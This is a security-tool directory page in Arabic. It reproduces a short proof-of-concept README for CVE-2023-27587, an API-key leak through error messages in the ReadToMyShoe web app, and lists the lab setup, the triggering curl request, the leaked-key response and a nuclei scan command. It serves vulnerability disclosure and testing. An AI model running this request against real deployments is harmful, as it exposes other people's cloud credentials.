Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-27587-PoC — PoC البسيط لـ CVE-2023-27587 | Kitploit
أدوات/GitHubGitHub/vagnerd/cve-2023-27587-poc
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويبكشف الأسرارأمن واجهات برمجة التطبيقات
GitHubvagnerd/cve-2023-27587-poc

CVE-2023-27587-PoC

PoC البسيط لـ CVE-2023-27587

عرض المستودع
51منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-27587-PoC

إثبات المفهوم البسيط لثغرة CVE-2023-27587

ما هو ReadToMyShoe؟

ReadtoMyShoe (RTMS) هو تطبيق ويب (rust وyew وaxum) يتيح لك رفع المقالات (عبر URL أو عبر اللصق المباشر) والاستماع إليها لاحقًا.

التأثير

إذا حدث خطأ أثناء إضافة مقال، يعرض الموقع رسالة خطأ للمستخدم. إذا كان الخطأ ناتجًا عن طلب Google Cloud TTS، فستتضمن الرسالة عنوان URL الكامل للطلب. ويحتوي عنوان URL الخاص بالطلب على مفتاح API الخاص بـ Google Cloud.

PoC

إعداد ReadtoMyShoe القابل للاستغلال

root@kitploit:~
$ git clone https://github.com/rozbb/readtomyshoe.git
$ cd readtomyshoe && git checkout v0.2.0
$ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
$ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
$ docker run -p 9382:9382 readtomyshoe-vul

الاستغلال

لا يتم كشف المفتاح إلا عند حدوث خطأ في استدعاء GCP!

root@kitploit:~
curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'content-type: application/json' \
  --data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'

خطأ الاستجابة (مفتاح API المكشوف):

root@kitploit:~
TTS failed: TTS request failed

Caused by:
    HTTP status client error (400 Bad Request) for url (https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=GCP_KEY_LEAKED_TEST%0A)

Screenshot from 2023-03-15 13-03-59

nuclei-template

https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-27587.yaml

root@kitploit:~
$ nuclei -t cves/2023/CVE-2023-27587.yaml -u http://<host>

Screenshot from 2023-03-15 13-22-23

المراجع

https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587

https://beta.readtomyshoe.com/

تنزيل الأداة